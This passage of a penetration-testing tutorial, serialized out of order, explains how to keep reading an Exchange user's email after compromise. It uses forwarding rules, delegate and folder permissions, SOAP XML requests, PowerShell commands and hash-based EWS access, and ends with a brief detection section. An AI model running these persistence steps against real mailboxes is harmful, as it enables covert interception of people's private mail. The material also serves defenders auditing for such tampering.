xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatefolder>\u003Cbr>      \u003Cm:folderchanges>\u003Cbr>        \u003Ct:folderchange>\u003Cbr>          \u003Ct:folderid id=\"{id}\" changekey=\"{key}\">\u003Cbr>          \u003Ct:updates>\u003Cbr>            \u003Ct:setfolderfield>\u003Cbr>              \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>              \u003Ct:folder>\u003Cbr>                \u003Ct:permissionset>\u003Cbr>                  \u003Ct:permissions>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:distinguisheduser>Default\u003C\u002Ft:distinguisheduser>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                      \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                      \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                      \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                      \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                      \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                      \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                      \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                      \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                    \u003Ct:userid>\u003Cbr>                      \u003Ct:distinguisheduser>Anonymous\u003C\u002Ft:distinguisheduser>\u003Cbr>                    \u003C\u002Ft:userid>\u003Cbr>                    \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                    \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                    \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                    \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                    \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                    \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                    \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                    \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                    \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                  \u003C\u002Ft:permissions>\u003Cbr>                \u003C\u002Ft:permissionset>\u003Cbr>              \u003C\u002Ft:folder>\u003Cbr>            \u003C\u002Ft:fielduri>\u003C\u002Ft:setfolderfield>\u003Cbr>          \u003C\u002Ft:updates>\u003Cbr>        \u003C\u002Ft:folderid>\u003C\u002Ft:folderchange>\u003Cbr>      \u003C\u002Fm:folderchanges>\u003Cbr>    \u003C\u002Fm:updatefolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latter part of this article will introduce the complete implementation code.\u003C\u002Fp>\u003Ch3>3. Implementation via PowerShell\u003C\u002Fh3>\u003Cp>Commands for managing mailboxes need to be executed on the Exchange server.\u003C\u002Fp>\u003Cp>First, you need to add the dependency package:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The management snap-in names vary for different Exchange versions:\u003C\u002Fp>\u003Cul>\u003Cli>Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;\u003C\u002Fli>\u003Cli>Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;\u003C\u002Fli>\u003Cli>Exchange 2013 &amp; 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fli>\u003C\u002Ful>\u003Cp>View the access permissions for user test2's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-MailboxFolderPermission -Identity test2@test.com:\\Inbox|fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Add read permission for user test2 to user test1's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-MailboxFolderPermission -Identity test1@test.com:\\Inbox -User test2@test.com -AccessRights Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remove user test2's read permission for user test1's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-MailboxFolderPermission -Identity test1@test.com:\\Inbox -User test2@test.com -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Method to Continuously Obtain Exchange User Inbox Emails by Adding Mail Functionality\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Add forwarding functionality via EAC\u003C\u002Fh3>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Frecipients\u002Fuser-mailboxes\u002Femail-forwarding?view=exchserver-2016\u003C\u002Fp>\u003Cp>Requires access to Exchange Admin Center (EAC), i.e., Exchange administrator permissions and access to Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in to ECP using Exchange administrator credentials\u003C\u002Fp>\u003Cp>Locate user test1 and edit, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017393631_4_dd4a22b5c5.jpeg\">\u003C\u002Fp>\u003Cp>Select Mailbox Features -&gt; Mail Flow -&gt; select View details\u003C\u002Fp>\u003Cp>Select Enable forwarding, add user, choose Deliver message to both forwarding address and mailbox, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017431017_5_9a43d63738.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the forwarding function setup is complete\u003C\u002Fp>\u003Cp>Whenever user test1 receives an email, the message will also be sent to user test2's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes the email from the inbox, test2 is not affected\u003C\u002Fp>\u003Ch3>2. Implement via Exchange Management Shell\u003C\u002Fh3>\u003Cp>Exchange Management Shell can be launched in the following three ways:\u003C\u002Fp>\u003Cp>(1) Run Exchange Management Shell directly on the Exchange Server\u003C\u002Fp>\u003Cp>(2) Start PowerShell on the Exchange Server and enter the command Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fp>\u003Cp>(3) Connect to the Exchange server using PSSession\u003C\u002Fp>\u003Cp>For detailed methods, refer to the previous article 'Penetration Basics – Searching and Exporting Emails from Exchange Servers'\u003C\u002Fp>\u003Cp>The PowerShell command to add forwarding of emails from user test1's inbox to user test2 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-Mailbox -Identity \"test1\" -ForwardingAddress \"test2\" -DeliverToMailboxAndForward $true\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If forwarding emails to an unverified external email address, replace ForwardingAddress with ForwardingSmtpAddress\u003C\u002Fp>\u003Ch2>0x05 Method to Add User Permissions for Persistent Access to Exchange User Emails\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fadd-mailboxpermission?view=exchange-ps\u003C\u002Fp>\u003Cp>The PowerShell command to add full access permissions for user test1 to user test2's mailbox is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-MailboxPermission -Identity \"test2\" -User \"test1\" -AccessRights FullAccess -InheritanceType All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to view the mailbox access permissions for user test2 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-MailboxPermission -Identity test2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to remove user test1's full access permissions to user test2's mailbox is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-MailboxPermission -Identity \"test2\" -User \"test1\" -AccessRights FullAccess -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add-RecipientPermission can only be used in cloud-based services. Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fadd-recipientpermission?view=exchange-ps\u003C\u002Fp>\u003Ch2>0x06 Open Source Code\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In practical use, if only the hash of a mail user is available, it is not possible to add mail forwarding rules via OWA and ECP.\u003C\u002Fp>\u003Cp>However, we can first log in to EWS using the hash, then send SOAP messages through a program to achieve this.\u003C\u002Fp>\u003Cp>Here, using the previously open-source program ewsManage.py as a template, the following features have been added:\u003C\u002Fp>\u003Cul>\u003Cli>getdelegateofinbox\u003C\u002Fli>\u003Cli>adddelegateofinbox\u003C\u002Fli>\u003Cli>updatedelegateofinbox\u003C\u002Fli>\u003Cli>removedelegateofinbox\u003C\u002Fli>\u003Cli>getdelegateofsentitems\u003C\u002Fli>\u003Cli>updatedelegateofsentitems\u003C\u002Fli>\u003Cli>restoredelegateofsentitems\u003C\u002Fli>\u003Cli>getinboxrules\u003C\u002Fli>\u003Cli>updateinboxrules\u003C\u002Fli>\u003Cli>removeinboxrules\u003C\u002Fli>\u003C\u002Ful>\u003Cp>GitHub code has been updated, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x07 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. View forwarding rules for a single mail user\u003C\u002Fp>\u003Cp>Access Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in, view organize email -&gt; inbox rules\u003C\u002Fp>\u003Cp>2. View access permissions for a single mail user\u003C\u002Fp>\u003Cp>Access Outlook Web Access (OWA)\u003C\u002Fp>\u003Cp>Log in, view Inbox-&gt;permissions...\u003C\u002Fp>\u003Cp>3. Check the inbox forwarding function for all mail users\u003C\u002Fp>\u003Cp>Run Exchange Management Shell, view the command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Mailbox|Select-Object UserPrincipalName,ForwardingAddress,ForwardingSmtpAddress\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces four methods to continuously obtain Exchange user inbox emails, provides open-source implementation code via SOAP XML messages, supports usage under hash-only conditions, and offers defense recommendations combined with exploitation approaches.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>When we obtain a user's password or hash, we can read that user's emails.\u003C\u002Fp>\u003Cp>If the user changes their password, can we continue to read that user's emails without knowing the new password?\u003C\u002Fp>\u003Cp>From a defensive perspective, when a mail user's password is leaked, what additional steps should we take after changing the password to ensure the security of email data?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding forwarding rules\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding access permissions\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding mail functions\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user emails by adding user permissions\u003C\u002Fli>\u003Cli>Open-source code\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Method to Continuously Obtain Exchange User Inbox Emails by Adding Forwarding Rules\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Adding forwarding rules via ECP\u003C\u002Fh3>\u003Cp>Requires access to Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in as user test1, select organize email -&gt; inbox rules, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017267123_0_d8247b6d3a-1.jpeg\">\u003C\u002Fp>\u003Cp>Select Create a new rule for arriving messages...\u003C\u002Fp>\u003Cp>Set Name as the rule name, here set to Forwardtest\u003C\u002Fp>\u003Cp>Configure sequentially as [Apply to all messages], Forward the message to..., select target user test2, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017290564_1_abd8302824-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the rule is successfully added\u003C\u002Fp>\u003Cp>Whenever user test1 receives an email, the email will also be sent to user test2's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes the email from the inbox, test2 is not affected\u003C\u002Fp>\u003Ch3>2. Implementation via SOAP XML message\u003C\u002Fh3>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fupdateinboxrules-operation\u003C\u002Fp>\u003Cp>Create and delete rules using UpdateInboxRules\u003C\u002Fp>\u003Cp>Format for creating a rule to forward emails to user test2:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updateinboxrules>\u003Cbr>      \u003Cm:removeoutlookruleblob>true\u003C\u002Fm:removeoutlookruleblob>\u003Cbr>      \u003Cm:operations>\u003Cbr>        \u003Ct:createruleoperation>\u003Cbr>          \u003Ct:rule>\u003Cbr>            \u003Ct:displayname>ForwardRule\u003C\u002Ft:displayname>\u003Cbr>            \u003Ct:priority>1\u003C\u002Ft:priority>\u003Cbr>            \u003Ct:isenabled>true\u003C\u002Ft:isenabled>\u003Cbr>            \u003Ct:conditions>\u003Cbr>            \u003Ct:exceptions>\u003Cbr>            \u003Ct:actions>\u003Cbr>              \u003Ct:forwardtorecipients>\u003Cbr>                \u003Ct:address>\u003Cbr>                  \u003Ct:emailaddress>test2@test.com\u003C\u002Ft:emailaddress>\u003Cbr>                \u003C\u002Ft:address>\u003Cbr>              \u003C\u002Ft:forwardtorecipients>\u003Cbr>            \u003C\u002Ft:actions>\u003Cbr>          \u003C\u002Ft:exceptions>\u003C\u002Ft:conditions>\u003C\u002Ft:rule>\u003Cbr>        \u003C\u002Ft:createruleoperation>\u003Cbr>      \u003C\u002Fm:operations>\u003Cbr>    \u003C\u002Fm:updateinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Reading rules uses GetInboxRules\u003C\u002Fp>\u003Cp>The format for reading rule information for user test1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getinboxrules>\u003Cbr>      \u003Cm:mailboxsmtpaddress>test1@test.com\u003C\u002Fm:mailboxsmtpaddress>\u003Cbr>    \u003C\u002Fm:getinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The RuleID corresponding to the rule can be obtained from the returned result.\u003C\u002Fp>\u003Cp>The format for deleting a specified rule is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updateinboxrules>\u003Cbr>      \u003Cm:removeoutlookruleblob>true\u003C\u002Fm:removeoutlookruleblob>\u003Cbr>        \u003Cm:operations>\u003Cbr>          \u003Ct:deleteruleoperation>\u003Cbr>            \u003Ct:ruleid>AQAAAAAADPg\u003C\u002Ft:ruleid>\u003Cbr>          \u003C\u002Ft:deleteruleoperation>\u003Cbr>        \u003C\u002Fm:operations>\u003Cbr>    \u003C\u002Fm:updateinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>AQAAAAAADPg is the RuleId, which can be obtained via GetInboxRules\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latter part of this article will introduce the complete implementation code\u003C\u002Fp>\u003Ch2>0x03 Method to Add Access Permissions for Persistent Access to Exchange User Inbox Emails\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Supports inbox, does not support outbox\u003C\u002Fp>\u003Ch3>1. Add inbox access permissions via OWA\u003C\u002Fh3>\u003Cp>Requires access to Outlook Web Access (OWA)\u003C\u002Fp>\u003Cp>Log in as user test1, select Inbox -&gt; permissions..., as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017321998_2_0f92ae2b10-1.jpeg\">\u003C\u002Fp>\u003Cp>Add user test2 with edit permissions\u003C\u002Fp>\u003Cul>\u003Cli>Read: Full details\u003C\u002Fli>\u003Cli>Write: Edit all\u003C\u002Fli>\u003Cli>Delete access: None\u003C\u002Fli>\u003Cli>Other: Folder visible\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Alternatively, directly set the Permission level to Editor, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017371093_3_88aca0cc5b-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, permission setup is complete\u003C\u002Fp>\u003Cp>Log in as user test2, select add shared folder..., enter username test1 to obtain access to user test1's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes emails from the inbox, test2 cannot read the deleted emails\u003C\u002Fp>\u003Ch3>2. Implement via SOAP XML message\u003C\u002Fh3>\u003Cp>Add access permissions using AddDelegate or UpdateFolder\u003C\u002Fp>\u003Ch4>1. AddDelegate\u003C\u002Fh4>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fadddelegate-operation\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>AddDelegate supports the following folders:\u003C\u002Fp>\u003Cul>\u003Cli>CalendarFolderPermissionLevel\u003C\u002Fli>\u003Cli>TasksFolderPermissionLevel\u003C\u002Fli>\u003Cli>InboxFolderPermissionLevel\u003C\u002Fli>\u003Cli>ContactsFolderPermissionLevel\u003C\u002Fli>\u003Cli>NotesFolderPermissionLevel\u003C\u002Fli>\u003Cli>JournalFolderPermissionLevel\u003C\u002Fli>\u003C\u002Ful>\u003Cp>To view the access permissions for user test1's inbox, use the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getdelegate includepermissions=\"true\">\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>    \u003C\u002Fm:getdelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Grant user test2 full access permissions to user test1's inbox, in the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:adddelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:delegateusers>\u003Cbr>      \u003Ct:delegateuser>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>        \u003Ct:delegatepermissions>\u003Cbr>          \u003Ct:inboxfolderpermissionlevel>Editor\u003C\u002Ft:inboxfolderpermissionlevel>\u003Cbr>        \u003C\u002Ft:delegatepermissions>\u003Cbr>        \u003Ct:receivecopiesofmeetingmessages>false\u003C\u002Ft:receivecopiesofmeetingmessages>\u003Cbr>        \u003Ct:viewprivateitems>false\u003C\u002Ft:viewprivateitems>\u003Cbr>      \u003C\u002Ft:delegateuser>\u003Cbr>    \u003C\u002Fm:delegateusers>\u003Cbr>      \u003Cm:delivermeetingrequests>DelegatesAndMe\u003C\u002Fm:delivermeetingrequests>\u003Cbr>    \u003C\u002Fm:adddelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Modify access permissions using UpdateDelegate\u003C\u002Fp>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fupdatedelegate-operation\u003C\u002Fp>\u003Cp>Set full access permissions for user test2 to user test1's inbox, format as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatedelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:delegateusers>\u003Cbr>      \u003Ct:delegateuser>\u003Cbr>        \u003Ct:userid>\u003Cbr>          